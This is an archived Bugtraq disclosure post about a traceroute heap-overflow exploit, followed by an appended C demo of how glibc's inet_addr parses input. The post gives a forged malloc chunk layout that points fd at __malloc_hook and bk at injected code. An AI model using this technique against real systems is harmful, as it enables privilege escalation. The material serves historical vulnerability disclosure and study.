[17022] in bugtraq


Addendum: Traceroute exploit

daemon@ATHENA.MIT.EDU (pedward@WEBCOM.COM)
Tue Oct 3 13:33:15 2000

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <200010030525.WAA00896@eris>
Date:         Mon, 2 Oct 2000 22:25:45 -0700
Reply-To: pedward@WEBCOM.COM
From: pedward@WEBCOM.COM
To: BUGTRAQ@SECURITYFOCUS.COM

I just saw Pavel's note and looked at glibc, inet_addr quits after finding
4 octets, so the first 8 bytes of rogue1 should look like:

"1.1."
"1.1 "

making rogue1 look like this in total:

prev_size = "1.1."
size      = "1.1 "
fd        = __malloc_hook - 12
bk        = 0x804cd7a + 0x20 (our rogue code)

That satisfies inet_addr to make "1.1.1.1" into an integer.

--Perry

--
Perry Harrington                 Director of                   zelur xuniL  ()
perry@webcom.com             System Architecture               Think Blue.  /\
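Added example, not part of Perry's post: a small C program showing the inet_addr() behaviour the note relies on. Once four octets are followed by a whitespace byte, glibc's inet_addr() (and inet_aton()) never looks at the rest of the buffer, whereas inet_pton() rejects the same input because it requires the whole string to be a dotted quad. The "AAAA"/"BBBB" bytes are constructed stand-ins for the fd/bk fields, not values from the post.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>

/* Constructed buffer with the 8-byte prefix from the post ("1.1." then
   "1.1 "), followed by two 4-byte fields standing in for fd and bk. */
static const char rogue_like[] = "1.1." "1.1 " "AAAA" "BBBB";

/* inet_addr() parses up to four octets and then only requires the next byte
   to be NUL or whitespace; anything after that byte is ignored. */
static int inet_addr_accepts(const char *s)
{
    return inet_addr(s) != INADDR_NONE;
}

/* The address inet_addr() actually produced, in network byte order. */
static in_addr_t inet_addr_value(const char *s)
{
    return inet_addr(s);
}

/* inet_pton() validates the entire string: trailing bytes make it fail,
   so it is the call to use when a full address string must be exact. */
static int inet_pton_accepts(const char *s)
{
    struct in_addr a;
    return inet_pton(AF_INET, s, &a) == 1;
}

int main(void)
{
    printf("inet_addr on prefix+trailing bytes: %s\n",
           inet_addr_accepts(rogue_like) ? "accepted" : "rejected");
    printf("inet_pton on the same buffer:        %s\n",
           inet_pton_accepts(rogue_like) ? "accepted" : "rejected");
    printf("inet_pton on plain \"1.1.1.1\":        %s\n",
           inet_pton_accepts("1.1.1.1") ? "accepted" : "rejected");
    return 0;
}
```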
